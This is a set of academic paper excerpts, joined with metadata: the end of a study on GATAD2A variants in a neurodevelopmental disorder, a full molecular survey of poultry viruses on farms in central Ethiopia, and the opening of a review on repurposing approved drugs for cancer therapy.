Individual P5 was a 4-year-old male who presented with GDD. No structural brain anomalies were observed by brain MRI and no craniofacial dysmorphisms were noted. Trio exome sequencing identified a de novo heterozygous GATAD2A missense variant (c.626C>T, p.T209I) in P5.
In summary, the shared clinical features with variable expressivity include GDD, hemihyperplasia, craniofacial dysmorphism, and structural brain defects (Table 1). Nearly all (4/5) individuals in our cohort presented with developmental and growth defects. Three of the five individuals exhibited craniofacial dysmorphology. Musculoskeletal anomalies were also observed in three of the five individuals. Although unlikely, variants of uncertain significance (VUSs) were identified in other genes in P1 and P2 that may also be contributing to the observed clinical phenotypes (Table 1). 32,33 GATAD2A heterozygous variants predicted to disrupt NuRD interactions correlate with neurodevelopmental features Both GATAD2 proteins possess two highly conserved domains: conserved region 1 (CR1) and conserved region 2 (CR2). 34 CR1 is more N-terminal and encodes a coiledcoil domain that interacts with a similar domain in MBD-proteins for coiled-coil binding; by contrast, CR2 is downstream and possesses GATA-type zinc finger domains shown to interact with CHD paralogs (Figure 2A). 5,16 CR1 is thought to tether the MBD-HDAC core unit to GATAD2 proteins, whereas CR2 tethers GATAD2 proteins to the CHD paralogs. CDK2AP1 has also been shown to interact with CR2. 35 Pairwise alignment indicates that GATAD2A has protein sequence homology (40.841%) with its paralog GATAD2B, predominantly around the CR1 and CR2 domains. Of note, in GATAD2B, LoF variants were identified across most of the coding sequence, while missense variants only localized to CR1 and CR2 domains. 5,16,36 Among the identified GATAD2A variants in our cohort, three were missense (c.1205G>T, G402V; c.1259 G>A, p.C420Y; c.626C>T, p.T209I), one was nonsense (c.673C>T, p.R225*), and one was frameshift (c.1877delT, p.I627Tfs) at the extreme C terminus (Figure 2A). Following ACMG standards and guidelines, one of the five GATAD2A variants was classified as likely pathogenic (p.I627Tfs), whereas the other four were VUSs (p.T209I, p.R225*, p.G402V, p.C420Y) ( Table 1). 37 All discovered variants were absent in public databases (gnomAD v.2.1.1), where GA-TAD2A demonstrated both high probability of LoF intolerance (pLI) (observed/expected SNVs [o/e] ¼ 0.06; pLI ¼ 1) and high intolerance to missense variation (o/e ¼ 0.83; Z ¼ 1.27). In light of the difficulty of interpreting variants of uncertain significance, we used the MetaDome web server, which pools data from gnomAD and the Human Gene Mutation Database to provide intolerance profiles for missense variants at amino acid-level resolution. 31 From this analysis, there is uneven intolerance across GATAD2A, with notable and predictable hotspots of intolerance concentrated around the CR1 and CR2 regions ( Figure 2B). Importantly, missense variants identified in our cohort lie at predicted intolerant residues in MetaDome. All GATAD2A variants affect conserved residues localized throughout GATAD2A ( Figure 2C). Except p.T209I, all variants have CADD scores above 20 (Table 1). Missense variants p.G402V and p.C420Y are predicted to be possibly or probably damaging by PolyPhen-2, and deleterious by SIFT (Table 1). These missense variants affect homologous residues that are conserved in GATAD2B ( Figure 2C). Notably, the p.G402V
missense variant affects a homologous residue to the GATAD2B p.G406 residue, where a pathogenic variant was previously identified in GAND, 16 as well as in two previously unreported individuals with GAND (variants p.G406S and p.G406C, data not shown) ( Figure 2C). These findings in several individuals with GAND indicate that the GATAD2B p.G406 residue has functional importance and the homologous residue p.G402 in GATAD2A is likely to have a similar effect. Previous studies have shown that GATAD2B p.G406R does not disrupt GATAD2B interactions with CHD proteins, suggesting that its pathogenicity may be associated with disruption of other protein interaction(s). Alternatively, both the GATAD2A (c.1205G>T, p.G402V) and GATAD2B (c.1216G>C, p.G406R) changes lie at exon-intron boundaries, with the GATAD2A variant predicted to have a LoF effect on the 3 0 splice site of intron 8, which may result in use of a cryptic splice three nucleotides upstream (var-SEAK, class 4). GATAD2B variants also provide additional evidence for the pathogenicity of the GATAD2A p.C420Y variant. Missense variants in GATAD2B affecting homologous zinc-binding cysteines were present in multiple individuals with GAND and are expected to have the same effect on GATAD2A. 16 Finally, our GATAD2 paralog protein alignment revealed that the p.I627Tfs variant lies within a C-terminal motif that is highly conserved across species as well as with GATAD2B, with the residues flanking the motif being widely divergent between the two paralogs ( Figure 2C). Conversely, the p.R225* nonsense and the p.T209I missense variants lie near PPPL4 motifs that are absent in GATAD2B ( Figure 2C). Together, these computational and population genetics analyses provide additional evidence for the negative functional consequence of these GATAD2A heterozygous variants. Of note, variants that might alter protein dosage (p.R225* and p.G402V) and/or structure of the CR2 domain (p.G402V and p.C420Y), and result in a functional haploinsufficiency, are present among individuals with neurodevelopmental defects. Among these, P1 and P2 (p.R225* and p.C420Y, respectively), present with structural brain defects including enlarged or asymmetric ventricles, thin corpus callosum, and macrocephaly. This evidence suggests that disruption and/or decreased dosage of the GATAD2A-CHD paralog interactions may be important for neural development.
GATAD2A interaction with NuRD components is disrupted by missense variant p.C420Y
Previous work has shown that the CTD of NuRD complex members CHD3, CHD4, or CHD5 is sufficient for GATAD2 protein interactions ( Figure 3A). 5,16 The GATAD2 proteins possess GATA-type zinc finger domains within CR2 that are required for this interaction. 16 Given that the p.C420 of GATAD2A residue is one of four cysteines that coordinate the zinc ion, we hypothesized that the p.C420Y missense variant may disrupt CR2 zinc finger folding and its subsequent interaction with CHD paralogs. This was previously seen for GATAD2B CR2 zinc-binding cysteine residue variants (p.C420R and p.C420S), which resulted in a GAND diagnosis ( Figure 3B). 5,16 To investigate the impact of the p.C420Y missense variant on interactions with CHD3, CHD4, and CHD5, we performed IVT in rabbit reticulocyte lysates to co-express the GATAD2A C420Y protein with each CHD-CTD FLAG-tagged fusion protein. Immunoprecipitation was performed using the FLAG-tagged CHD-CTD fusion proteins as bait followed by pull-down with an anti-FLAG antibody. Compared with GATAD2A WT protein, there was a marked reduction in GATAD2A C420Y binding to all three CHD paralogs ( Figure 3C). These findings provide evidence that the p.C420Y missense variant perturbs interactions within the CRS of the NuRD complex.
Discussion
We report de novo heterozygous dominant variants in GA-TAD2A as a genetic basis of a developmental disorder that we abbreviate as GATAD2A-related neurodevelopmental disorder (GARND). Five distinct GATAD2A variants were identified in five unrelated individuals whose prior genetic testing did not reveal other pathogenic or structural variants in genes that could explain the full array of clinical presentations. Many of the individuals in our cohort presented with overlapping developmental defects. In silico and functional analyses, along with evidence from homologous variants in GATAD2B, support a deleterious effect of the identified GATAD2A nonsense, frameshift, and missense variants. Our immunoprecipitation studies also show a disruption of the interaction between the GATAD2A C420Y and the CHD paralogs within the CRS. Further investigation will be required to determine if this results in a LoF haploinsufficiency mechanism of disease or a dominant-negative disorder due to sequestration of HDAC-MBD-GATAD2A C420Y partial complex from the CHD paralogs.
Despite some shared clinical features, our clinical findings indicate a range of phenotypic findings in GARND including craniofacial dysmorphisms, musculoskeletal anomalies, cerebral malformations, cardiovascular anomalies, and ophthalmological abnormalities. Little information has been known about GATAD2A variants in disease. One previous report of a nonsense variant in GATAD2A (c.19C>T, p.R7*) linked it to elevated levels of fetal hemoglobin, but made no mention of neurodevelopmental status. 18 The report also identified several predicted benign GATAD2A missense variants with only one present within CR2 (p.N382S). None of these were associated with changes in fetal hemoglobin levels and no neurodevelopmental data was reported. Whether individuals in our cohort have elevated fetal hemoglobin is unknown.
The array of clinical phenotypes in our GARND cohort show moderate overlap with other dominant NuRDopathies (CHD3RS, CHD4RS, CHD5RS, and GAND). [5][6][7][8]16 In all five disorders, GDD, hypotonia, and dysmorphic craniofacial features (broad forehead, hypertelorism, wide nasal bridge) have been noted. For all disorders except CHD5RS, macrocephaly and ventriculomegaly have been observed, although it is more common in GAND than in CHD3RS and CHD4RS. 5 The phenotypes of GARND, GAND, CHD3RS, and CHD5RS all include speech deficits, whereas CHD4RS, GARND, and GAND phenotypes include congenital cardiac defects. GARND, GAND, and CHD3RS also share neonatal feeding difficulties. Unlike GAND's relatively consistent phenotype across affected individuals, the GARND phenotypes reported here were more variable across individuals. Whether this was the result of the cohort's unique variant makeup (and lack of redundancy) or GARND itself needs to be determined. As more cases of GARND are defined, it will be important to evaluate the frequency of divergent phenotypic NuRDopathy features such as macrocephaly, kidney disease, and hearing impairment, and the pattern of shared features between GARND and other NuRDopathies.
Our findings provide evidence in support of a hypothesis wherein pathogenic heterozygous variations in GATAD2A act through a LoF haploinsufficiency mechanism in affected individuals. The variability in clinical phenotypes in our cohort, coupled with the variable predicted intolerance across GATAD2A, may reflect the importance of 2A-NuRD during development and/or a polygenic effect based on genetic background. Furthermore, pleiotropic functions of GA-TAD2A in tissues may reflect cell-type variation in GATAD2 and NuRD paralog redundancy. Of note, we observed neurodevelopmental features in individuals with GATAD2A variants that could cause haploinsufficiency of CR2 function, which are predicted to disrupt interactions with the CTD region of CHD paralogs. These findings suggest that neural development is particularly susceptible to impairment of the chromatin remodeling activity of 2A-NuRD and 2B-NuRD complexes. Our co-immunoprecipitation findings confirm diminished GATAD2A-CHD interaction in the presence of the CR2-localized p.C420Y missense variant (similar to a number of patient variants in GAND). 5,16 We showed that the GATAD2A p.C420Y affects a cysteine within a zinc-binding motif, which is also disrupted by previously reported GATAD2B p.C420 variants in individuals with GAND ( Figure 2C). 5, 16 We also found that the affected glycine of GATAD2A p.G402V is homologous to that of the previously identified GATAD2B p.G406R. 5,16 Together, these findings provide evidence for the pathogenicity of GATAD2A p.G402V and p.C420Y. We hypothesize different mechanisms for dysfunction for the p.T209I and p.I627Tfs variants, which do not localize to or disrupt CR1 or CR2 interaction domains. For instance, the p.T209I variant lies within a region containing three PPPL4 motifs, which are important for GATAD2A interactions with ZMYND8 and the subsequent recruitment of 2A-NuRD to sites of DNA damage for assisting in repair. 21 It remains unclear if there are other specific functions of the three PPPL4 motifs in neural development. The C-terminal p.I627Tfs variant, which lies within a previously unreported GATAD2 motif, may disrupt an important interaction with other as yet unknown proteins involved in 2A-NuRD (and likely 2B-NuRD) function. Alternatively, although less likely given its extreme C-terminal location, the frameshift variant may trigger mRNA or protein degradation, resulting in haploinsufficiency. Of course, this variant could also represent a benign change in an individual with a different developmental disorder. Additional cases will help to confirm GATAD2A-related pathogenicity in development and refine the GARND clinical spectrum.
Our human genetics findings suggest distinct but overlapping pathogenic mechanisms of variants in GATAD2 paralogs. It remains unclear if GATAD2A and GATAD2B provide full, partial, or no redundancy in NuRD function during development, and whether their functions are cell-type specific with minimal overlap of expression. In prior studies, GATAD2B overexpression failed to rescue a GATAD2Arelated phenotype in GATAD2A-depleted induced pluripotent stem cells, potentially indicating non-redundancy with GATAD2B. 22 GATAD2B non-redundancy is also demonstrated by the unique GATAD2A interaction with ZMYND8 through PPPL4 domains, which are absent in GA-TAD2B. 21 To date, there are no specific assays of GATAD2B function and therefore there are no data to determine if GATAD2A could compensate for its deficiency. Additional work is necessary to assess the degree to which, if any, GATAD2B and GATAD2A compensatory activity mediates variable expressivity in or between GARND and/or GAND.
In summary, we report five unrelated individuals with heterozygous variants in GATAD2A and a neurodevelopmental disorder characterized by GDD, structural brain defects, and craniofacial dysmorphism. Discovery of additional affected individuals will provide further insight into the breadth of pathogenic genetic variation and constellation of clinical features associated with GARND.
Hospital Foundation. We would like to thank Dr. Steven Leber for interpretation of brain MRI findings. We would like to thank the contributors to GeneMatcher, MyGene2, and The University of Washington Center for Mendelian Genomics and GeneDx for use of data. Sequencing provided by the University of Washington Center for Mendelian Genomics (UW-CMG) was funded by NHGRI and NHLBI grants UM1 HG006493 and U24 HG008956. The content is solely the responsibility of the authors and does not necessarily represent the official views of the National Institutes of Health. This research was supported by NIH R01 DC018404 and the Ravitz Foundation Professorship granted to D.M.M., as well as the Fashion Industries Guild Endowed Fellowship for the Undiagnosed Diseases Program, the Cedars-Sinai Diana and Steve Marienhoff Fashion Industries Guild Endowed Fellowship in Pediatric Neuromuscular Diseases, and the Cedars-Sinai institutional funding program awarded to T.M.P. | 2023-04-22T15:07:28.530Z | 2023-04-01T00:00:00.000 | {
"year": 2023,
"sha1": "1cae50cb163548db2b82b1e297c9e7c208de6782",
"oa_license": "CCBYNCND",
"oa_url": "https://doi.org/10.1016/j.xhgg.2023.100198",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "e9f208456524d075ba7ea6e4783966bff2af3da8",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Medicine"
]
} |
245247799 | pes2o/s2orc | v3-fos-license | Molecular Survey of Viral Poultry Diseases with an Indirect Public Health Significance in Central Ethiopia
Simple Summary Poultry production is increasing, in Ethiopia as well, and poultry is an extremely valuable food resource. This survey investigated the presence of important viral pathogens in poultry (infectious bronchitis virus (IBV), avian metapneumovirus (aMPV), infectious bursal disease virus (IBDV) and Newcastle disease virus (NDV)) using biomolecular assays and sequencing. The results suggested a low circulation of these pathogens, probably owing to vaccination strategies. A routine diagnostic activity should be planned to monitor pathogen circulation and support disease prevention and production levels. Abstract The importance of poultry production is globally increasing, in Ethiopia as well, where high-quality protein and contained costs make poultry a valuable food resource. However, this entails some problems linked to rural, backyard and intensively reared flock proximity and pathogen circulation. This study is aimed at monitoring the presence of important viral pathogens in poultry (infectious bronchitis virus (IBV), avian metapneumovirus (aMPV), infectious bursal disease virus (IBDV) and Newcastle disease virus (NDV)) in Ethiopia. Respiratory and cloacal swabs and bursa of Fabricius and kidney imprints on FTA cards were collected in 2021 from 16 farms and tested for IBV, aMPV, NDV and IBDV. One farm was positive for IBDV, resulting in strains similar to those present in vaccines, belonging to genogroup A1a; two farms were positive for IBV but, due to sensitivity limits, only one sample was sequenced, resulting in a 4/91-like strain (GI-13); a layer farm tested positive for NDV with a Lasota-like vaccine strain. These findings suggest a low presence of these pathogens, probably due to the implementation of vaccination strategies, which is also testified by the detection of vaccine strains. A close diagnostic activity should be implemented on a routine basis in order to monitor pathogen circulation, ameliorate biosecurity measures and protect animal health and production levels.
Introduction
Poultry production is generally hindered by different diseases, and viral agents are among the most frequently occurring pathogens, especially in Ethiopia, where Newcastle disease (ND) and infectious bursal disease (IBD) are some of the major causes of morbidity and mortality [1][2][3][4]. These are high-priority viral poultry diseases in Ethiopia, since intensive poultry farming is growing but it is still flanked by rural and backyard flocks, which greatly differ in their health standards and rearing conditions [3]. To sustain intensive farming, exotic breeds are becoming more and more commonly raised, thus there is a higher host susceptibility due to suboptimal growth and productivity levels. This is considered to complicate the scenario, together with the possible pathogen introduction along with the new breeds [3]. At the same time, large populations of intensively reared chickens are surrounded by small farms and backyard flocks where biosecurity measures are not strict enough, animals of different ages are kept together or birds are not fully vaccinated due to costs, required expertise and the difficulty of purchasing vaccines for private owners [3].
On the other hand, despite the routine vaccinations being implemented on commercial poultry farms in Ethiopia, NDV outbreaks have been reported and mortality rate remains high [10]. Newcastle disease virus (NDV) is identified as a major killer, largely contributing to economic losses for the poultry sector in Ethiopia, and it is usually the first disease suspected during disease outbreaks [11]. Studies revealed that the majority of the virus strains circulating in village chickens in Ethiopia were virulent strains grouped in the sub-genotype VIf of class II viruses [12].
Infectious bursal disease virus (IBDV) is another common pathogen that usually affects young chickens and weakens their immune system, predisposing the birds to vaccination failure and opportunistic pathogens [13]. The mortality rates in Ethiopian chickens were reported to reach 50% [14]. Low biosecurity standards contribute to the spread of IBDV with risk factors such as visitors from different poultry houses, workers owning rural birds and vendor vehicles aggravating the transmission of the virus [15].
IBDV is an emerging disease in Ethiopia, and it was detected in 2002 for the first time [14]. Its circulation seems to be worsened by the adoption of exotic breeds of chickens, which are considered less resistant than indigenous breeds [16,17]. From the few commercial poultry farms situated in the central part of Ethiopia, in which the disease was first reported, IBDV has widely spread to other parts of the country (Berhanu et al., 2018). Studies have revealed that very virulent IBDV (vvIBDV) strains are circulating in Ethiopia (Shegu et al., 2020), and other work also reported that the Ethiopian IBDVs represented two genetic lineages: the very virulent (vv) IBDVs and variants of the classical attenuated vaccine strain (D78) [18] that is currently adopted, as well as other vaccines based on different strains: B2K, LC75, EXTREM and Winterfield-2512 [17,19].
Despite regular vaccination practices, IBDV is still found in Ethiopia involving both commercial and backyard poultry [20].
Avian infectious bronchitis (IB) is another important disease of poultry that affects the respiratory tract, gut, kidney and urogenital and reproductive systems of chickens [21].
Few studies conducted in different parts of Ethiopia have reported IBV seroprevalence to be high on both commercial and backyard chicken farms. Four serotypes of infectious bronchitis virus were identified from backyard and commercial farms in Ethiopia, namely M41 (GI-1), D-274 (GI-12), 793B (GI-13) and QX (GI-19) [22]. Hutton et al., (2017) also identified a strain belonging to the 793B genotype (GI-13), together with another study reporting the detection of 793B-like (GI-13) strains in distantly spaced backyard flocks, suggesting relevant viral circulation [1].
In these studies [1,2], the authors also detected aMPV subtype B, both in backyard and intensively raised flocks, with respiratory signs. aMPV is a respiratory pathogen whose importance is growing in poultry. Vaccination for aMPV is not commonly adopted in chickens, especially in Ethiopia, where it is currently unavailable [2], so the control of this agent mainly relies on biosecurity. The introduction of aMPV has also been tentatively linked to the importation of birds [1]. Mortality rates are usually low, except for cases of secondary infection that can result in severe forms, in particular with Escherichia coli [23].
These infections in poultry deeply affect production but they can also lead to a greater risk for human health, due to the increased susceptibility to both viral and bacterial secondary infection. For example, IBDV does not have any zoonotic potential, but its immunosuppressive nature could favor the replication of pathogens of zoonotic importance, such as Salmonella spp., Campylobacter spp. and Avian influenza virus [24,25].
Viral diseases are not well studied in most developing countries [2], and the few existing studies in Ethiopia were also largely based on serological tests, rather than on the molecular characterization of the circulating strains [26]. Scarce epidemiological knowledge limits the attempt for control of these diseases and the growth of poultry production.
In order to contribute towards a wider understanding of the epidemiology of the most common viral agents in poultry, the present study was designed to detect the presence of NDV, IBDV, IBV and aMPV and molecularly characterize the circulating strains among poultry farms in the Bishoftu and Mojo towns in Central Ethiopia.
Materials and Methods
This study was performed in March 2021, and it was centered on Bishoftu and Mojo towns, situated in the East Shewa zone of the Oromia region, Ethiopia. This area was purposely selected based on the large number of poultry farms located here. The sampled farms were further selected based on accessibility and the willingness of the owners to allow the sample collection.
Ten respiratory (pharyngeal and tracheal) and ten cloacal swabs were collected from each visited farm or shed on a farm. Before being pooled, both respiratory (pharyngeal and tracheal) and cloacal swabs were air dried separately for ten minutes and then placed in two different falcon vials. Additionally, FTA card imprints of the bursa of Fabricius and kidneys were collected from dead or moribund chickens humanely euthanized by manual cervical dislocation, on a broiler farm, where mortality was encountered at the time of visit. The FTA card imprints were then pooled based on the farm and shed. Along with the sample collection, different parameters of the farms and study population were recorded, such as number of sheds, total number of birds on the farms, age at sampling, genetic type, vaccination protocol, clinical signs, lesions, applied treatments and morbidity and mortality rates. The anamnestic data were then organized in a comprehensive database.
Samples were briefly stored at +4 • C until the end of the sample collection and then shipped at room temperature to the MAPS Department at Padua University (Italy). Then, laboratory analyses were conducted, and samples were stored at −80 • C until processing, except for FTA cards, which were always kept at room temperature. The pooled swabs were resuspended in 2 mL of PBS and vortexed. FTA card imprints were cut, placed into 1.5 mL tubes, resuspended in 1 mL of PBS and vortexed. A 200 µL aliquot of each resuspended pool was used for nucleic acid extraction with a High Pure Viral Nucleic Acid Kit (Roche, Basel, Switzerland), and then, the extracted samples were stored at −80 • C until further analyses.
Based on the matrix, samples were tested with different molecular assays for different pathogens according to their expected tropism: respiratory swabs were tested for IBV, aMPV and NDV; cloacal swabs were tested for IBV, IBDV and NDV; kidney FTA imprints were tested for IBV; bursa FTA imprints were tested for IBDV.
For aMPV detection and subtyping, a multiplex one-step real time RT-PCR, targeting the G gene [27], was performed using a SuperScript™ III One-Step qRT-PCR System, with a Platinum™ Taq DNA Polymerase kit (Invitrogen™, Waltham, MA, USA) on a LightCycler ® 96 Instrument (Roche, Basel, Switzerland). Using the same kit and instrument, a preliminary screening for IBV was performed, targeting the UTR region [28], then a onestep RT-PCR, targeting the hypervariable region of the S1 gene, was used for further sequencing and characterization of IBV-positive samples [29]. For NDV detection, a onestep RT-PCR, targeting the F gene, was used [30]. For IBDV, a one-step RT-PCR, targeting the VP2, was used [31].
All RT-PCRs were performed using a SuperScript™ III One-Step RT-PCR System with a Platinum™ Taq DNA Polymerase kit (Invitrogen™, Waltham, MA, USA) on an Applied Biosystems 2720 Thermal Cycler (Applied Biosystems, Waltham, MA, USA). Amplicon presence and specificity were examined by agar gel electrophoresis in SYBR™ Safe-stained (Invitrogen™, Waltham, MA, USA) agar gel.
For strain characterization, positive samples for the various pathogens were Sanger sequenced in both directions with the same primer pairs of the RT-PCR assays used for amplification [29][30][31]. Positive samples were prepared for Sanger sequencing and shipped to the sequencing external service of Macrogen Spain (Madrid, Spain). Chromatograms were inspected for quality with FinchTV (Geospiza Inc., Seattle, WA, USA) and assembled in consensus sequences using ChromasPro 2.1.8 (Technelysium Pty Ltd., Helensvale, QLD, Australia). Nucleotide sequences were initially evaluated for specificity using a BLAST [32] search in order to be characterized. For phylogenetic analyses, the database proposed by Valastro et al., (2016) was used for IBV characterization; for IBDV strain characterization, the adopted reference database and classification were those published by Islam et al., (2021); then, for NDV classification, the latest and updated classification approach by Dimitrov et al., (2019) was used [33][34][35]. Sequences were aligned to reference datasets using the MEGA X [36] software for phylogenetic analyses. Phylogenetic trees were reconstructed using the Maximum Likelihood method, and branch support was calculated by performing 1000 bootstrap replicates [36].
Results
The sampling activity was conducted in March 2021, and a total of 54 pooled samples were collected from 16 farms, located in Bishoftu (10 farms) and Mojo (6 farms). The majority of the animals were layers and were sampled by collecting respiratory and cloacal swabs, while bursa and kidney imprints were collected from six different sheds on a broiler farm. Layers were sampled because of the presence of clinical signs such as torticollis, neck twisting, swollen eyes, eye discharge, dyspnea, salivation, diarrhea, loss of feathers, swollen vent, weakness/listlessness, depression and leg paralysis, and also from apparently healthy farms (five farms). Sampling on the broiler farm was performed because the birds showed hyperemic bursal tissue, a swollen or atrophied bursa and urates in the kidneys at postmortem examination.
When they were applied, treatments ranged from vitamin supplements to antimicrobial drugs (oxytetracycline, sulfadiazine or norfloxacin) to coccidiostats (diclazuril and amprolium hydrochloride). The age of the layers ranged from 3 months to 1 year (mean 9.95 months), whereas broilers were 9 to 23 days old. The genetic types were Bovans Brown and Lohmanns for layers and Cobb 500 for broilers. The population on the layer farms ranged from 150 to 12,000 birds (mean 3528.78), and the mean and median overall mortality rates were 3.25% and 0.33% (range 0-19.23%), respectively, with a higher mortality on smaller farms (rearing less than 300 birds). On some farms, no official records of mortality were kept, and farmers reported the absence of mortality that should actually have been reported as an expected number of deaths, based on the type of birds reared and management levels. The birds were commonly vaccinated against Newcastle disease, infectious bursal disease, Marek's disease, fowl pox and fowl typhoid, while broilers were vaccinated against Newcastle disease, infectious bursal disease and also infectious bronchitis.
All samples were negative for aMPV. A total of 2 out of 16 farms (12.5%) (three samples: one cloacal swab pool from a layer farm and two FTA card kidney imprints from the broiler farm) were positive for IBV from real-time RT-PCR screening at high Ct (>38). However, due to sensitivity limits, only one sample was successfully sequenced, resulting in a 4/91-like strain (GI-13) [33] (Figure 1 shows a 99.4% identity with the reference strain MT701511.1).
The sample was collected from a layer farm located in Bishoftu town hosting 3-monthold animals with gastroenteric clinical signs and depression, where birds were reportedly vaccinated with 1/96-based (GI-13) and mass-based (GI-1) vaccines. Only one cloacal swab pool from a Lohmanns layer farm of 1-year-old birds, located in Mojo town, tested positive for NDV (1/15 layer farms, 6.7%), resulting in a vaccine strain close to the Lasota strain (showing a 99.8% identity with strain ID AF077761) belonging to genotype II, based on the updated classification [35] (Figure 2). This vaccine was used in the vaccine protocol implemented on the positive farm, as reported by the farmer. [33]. The phylogenetic tree was reconstructed using the Maximum Likelihood method and General Time Reversible model with discrete Gamma distribution. Branch support is shown next to the branches. The Ethiopian strain is marked with a red circle, sequences belonging to the different lineages have been collapsed and single branches represent unique variants. [35]. The phylogenetic tree was reconstructed using the Maximum Likelihood method and Kimura 2-parameter model with discrete Gamma distribution. Branch support is shown next to the branches. The Ethiopian strain is marked with a red circle.
All cloacal swabs from the layer farms tested negative for IBDV, whereas 3 out of 8 bursa imprint pools from the broiler farm (1/16 farms, 6.25%) were positive for IBDV, resulting in highly similar sequences (99.8-100% identity) to the Winterfield-2512 vaccine strain (reference strain MH329181.1), belonging to the classical/virulent genogroup A1a [34] (Figure 3). According to the declared vaccination strategy of the farm, this strain was used for the bird immunizations. [34]. The phylogenetic tree was reconstructed using the Maximum Likelihood method and Kimura 2-parameter model with a discrete Gamma distribution. Branch support is shown next to the branches. The Ethiopian strains are marked with a red circle.
Discussion
In the present study, detection of the investigated pathogens was limited to four farms only: each farm was positive for a different agent (two farms for IBV, one for NDV and one for IBDV). Unfortunately, it was impossible to further characterize two of the IBV detections from the same farm, while all the characterized strains appeared to be vaccine strains (a 4/91-like vaccine strain, a Lasota-like vaccine strain and a Winterfield-2512-like vaccine strain), indicating either the persistence of the administered vaccine or the spread of vaccine strains from neighboring farms. The positive samples were collected from layer and broiler birds that were reportedly vaccinated against different viral diseases, including those investigated here (IBV, NDV and IBDV), with vaccines based on the detected strains for IBDV and NDV. Regarding IBV detection, the introduction of a vaccine-derived strain from an unknown source (farms implementing a different vaccine protocol, contaminated fomites or personnel) cannot be excluded, since the protocol that was applied on the farm involved different strains.
The persistence of a vaccine strain is a common finding when live vaccines are administered, because they can be shed in feces, followed by re-uptake by the birds and subsequent collection during sampling, thus complicating the diagnostic process. However, the within-flock circulation of live vaccines can also lead to vaccine reactions, when the initial coverage for the birds is only partial [37]. This aspect does not really explain the clinical signs recorded on the positive farms, since different clinical signs (enteric signs, data not shown) to those from typical vaccine reactions were reported on the farm where an IBV vaccine-like strain was detected. Furthermore, on the farm where an NDV vaccine-like strain was detected, no clinical signs were registered, which is desirable. On the broiler farm where IBDV vaccine-like strains were detected, the main recorded lesions were urate deposits in the kidneys.
Even though, in some cases, the reported clinical signs might have been partially suggestive of the investigated pathogens, the actual cause should be ascribed to other problems, most likely of both infectious and managerial origin.
The absence of field strains is surprising, given that the local epidemiology and previous work reported the consistent presence of pathogens such as NDV [5,38], IBV [1,2] and IBDV [39,40]. This finding is also supported by the low mortality rates reported in some cases by the farmers. A certain seasonality, with a higher occurrence of NDV outbreaks during the pre-rainy season, was proposed [41], and the timing of sampling (March) could have influenced the detection rate in the present study. Conversely, all farms declared that they vaccinate their birds, although they did not disclose the complete protocol. The implementation of vaccination surely plays a role in preventing viral circulation, together with possible previous natural infection, and this could have contributed to the acquisition of natural immunity, which was not investigated by serological means in this study.
Vaccination in Ethiopia is often performed on the farm, at the hatchery or at the source, before introducing the animals to the farm, usually starting from one day of age [11]. In fact, Oromia, the region where the study was set, is one of the regions in Ethiopia with the highest accessibility to vaccination and veterinary services, as reported by Aswaf et al., (2021) [42].
Vaccination and biosecurity are the key factors in achieving disease control and efficient production, but these measures are often difficult to apply to rural or village farms. However, in this study, small-sized farms (<500 birds) were also free from field strains, suggesting the presence of fair biosecurity levels, prophylactic measures and limited contact with neighboring farms or other potential sources of infection.
Conclusions
The low circulation of these viruses in this region limits the risks associated to their role as door openers for secondary pathogens, impacting not only poultry production but also public health. Thus, in conclusion, this study displays a reassuring picture of the epidemiological situation in the Oromia region, Ethiopia, and aims to stress the importance of thorough monitoring, information sharing and the implementation of both vaccination strategies and biosecurity measures. | 2021-12-17T16:52:37.535Z | 2021-12-01T00:00:00.000 | {
"year": 2021,
"sha1": "57a8c8b66542977d346f07015657e017ef45acf9",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2076-2615/11/12/3564/pdf",
"oa_status": "GOLD",
"pdf_src": "MergedPDFExtraction",
"pdf_hash": "be066dda209df83d7a783311ed8032e5d24cc092",
"s2fieldsofstudy": [
"Agricultural And Food Sciences"
],
"extfieldsofstudy": [
"Medicine"
]
} |
231757779 | pes2o/s2orc | v3-fos-license | Repurposing approved drugs for cancer therapy
Abstract Background Many drugs approved for other indications can control the growth of tumor cells and limit adverse events (AE). Data sources Literature searches with keywords ‘repurposing and cancer’ books, websites: https://clinicaltrials.gov/, for drug structures: https://pubchem.ncbi.nlm.nih.gov/ Areas of agreement Introducing approved drugs, such as those developed to treat diabetes (Metformin) or inflammation (Thalidomide), identified to have cytostatic activity, can enhance chemotherapy or even replace more cytotoxic drugs. Also, anti-inflammatory compounds, cytokines and inhibitors of proteolysis can be used to control the side effects of chemo- and immuno-therapies or as second-line treatments for tumors resistant to kinase inhibitors (KI). Drugs specifically developed for cancer therapy, such as interferons (IFN), the tyrosine KI abivertinib TKI (tyrosine kinase inhibitor) and interleukin-6 (IL-6) receptor inhibitors, may help control symptoms of Covid-19. Areas of controversy Better knowledge of mechanisms of drug activities is essential for repurposing. Chemotherapies induce ER stress and enhance mutation rates and chromosome alterations, leading to resistance that cannot always be related to mutations in the target gene. Metformin, thalidomide and cytokines (IFN, tumor necrosis factor (TNF), interleukin-2 (IL-2) and others) have pleiomorphic activities, some of which can enhance tumorigenesis. The small and fragile patient pools available for clinical trials can cloud the data on the usefulness of cotreatments. Growing points Better understanding of drug metabolism and mechanisms should aid in repurposing drugs for primary, adjuvant and adjunct treatments. Areas timely for developing research Optimizing drug combinations, reducing cytotoxicity of chemotherapeutics and controlling associated inflammation.
Introduction
Using compounds approved for one clinical use in another disease or syndrome is referred to as 'repurposing'. Most of the drive for repurposing is the high cost of developing a drug, and the very long time it can take to determine the safety and specificity of a completely new drug. The timeline for any new cancer drug to go through enough clinical trials to obtain approval can be years, or even decades. Even for chronic myeloid leukemia (CML), which may affect about 0.2% of the population during their lifetime, over a decade was required for one of the first therapeutic KIs, Gleevec, to become standard of care. For smaller patient pools or drugs with less clear results in treatment, the delay can be even longer. Approval of omacetaxine, a plant alkaloid that inhibits protein translation, for treating TKIresistant CML took more than 30 years. 1 A phase 1 trial (NCT02081378) for asciminib (an allosteric inhibitor of the ABL kinase) to treat TKI-resistant CML and Philadelphia chromosome-positive acute lymphoblastic leukemia (ALL), began in 2014, is ongoing in August of 2020 with an estimated completion date of 2024.
